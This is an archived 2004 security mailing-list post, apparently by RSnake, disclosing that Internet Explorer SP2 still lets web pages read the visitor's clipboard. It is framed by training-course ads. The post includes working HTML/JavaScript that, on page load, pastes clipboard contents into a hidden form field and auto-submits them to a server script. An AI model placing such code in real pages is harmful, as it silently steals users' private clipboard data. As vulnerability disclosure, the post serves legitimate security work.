Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Web-App-Sec
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

clipboard vuln still working in SP2?

from [RSnake] Network Security [Permanent Link]
Subject: clipboard vuln still working in SP2?
Date: Fri, 27 Aug 2004 19:54:04 -0700 (PDT) 

        I have seen a few exploits about this (one by Tom Gilder in 2002 using
clipboardData.getData("Text"); and one by Juan Carlos Garcia Cuartango using
execCommand("Paste"); which is similar to the one below). However, I believed
this was going to be solved in IE SP2.  I cannot see any reason why websites,
by default, should be allowed access to my clipboard.  Working sample code is
located at:

http://www.shocking.com/~rsnake/cutandpaste.html

        Here is the code for it (why wasn't this fixed in SP2?):

<body onload="cutandpaste();">
<form name=f action="cutandpaste.cgi">
  <input type="submit" class="button" name="s"/>
  <TEXTAREA rows=1 cols=1 maxlength=4000 name=clipb value="a"></TEXTAREA>
</form>
<script>
  function cutandpaste() {
    document.f.clipb.createTextRange().execCommand("SelectAll");
    document.f.clipb.createTextRange().execCommand("Paste");
    document.all.f.s.click();
  }
</script>
</body>

-R

The information in this email is confidential and may be legally
privileged.  It is intended solely for the addressee.  Access to
this email by anyone else is unauthorized.  If you are not the
intended recipient, any disclosure, copying, distribution or any
action taken or omitted to be taken in reliance on it is
expressly prohibited and may be unlawful.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • clipboard vuln still working in SP2?, RSnake <=
Previous by Date:  Paros v3.1.3 (proxy plus scanner) is now available!, contact
Next by Date:  Re: Web Scams, Don Voss
Previous by Thread:  Paros v3.1.3 (proxy plus scanner) is now available!, contact
Next by Thread:  The ever encroaching blur between web apps and apps, Mark Curphey
Indexes:  [Date] [Thread] [Top] [All Lists]